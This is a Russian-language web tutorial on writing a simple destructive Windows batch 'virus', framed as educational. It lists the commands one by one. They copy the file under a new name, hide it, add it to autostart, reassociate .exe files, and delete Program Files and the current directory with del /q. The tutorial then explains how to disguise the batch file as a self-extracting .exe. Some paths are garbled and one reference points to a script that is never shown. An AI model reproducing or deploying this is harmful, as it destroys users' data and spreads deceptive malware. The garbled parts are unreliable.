Как написать простейший вирус

Эта статья не для того, чтобы научить вредительству, эта статья для того, чтобы помочь пониманию устройства большинства вируса с тем, чтобы знать как с ними бороться и чего не следует делать наверняка с незнакомым файлом. Итак:

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования).

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

Первым делом открываем блокнот;

Заносим туда команды, т.е. создаём в нём «тело» вируса;

Сохраняем свой труд через Файл -> Сохранить как;

Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

@Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.

Date11.14 – указывает на дату создания.

If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет

Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat

Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.

Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.

:abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.

md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.

Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.

assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp

del c:Program Files /q –всё, что было в папке Program Files удалится.

del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

Войдите или Зарегистрируйтесь чтобы комментировать.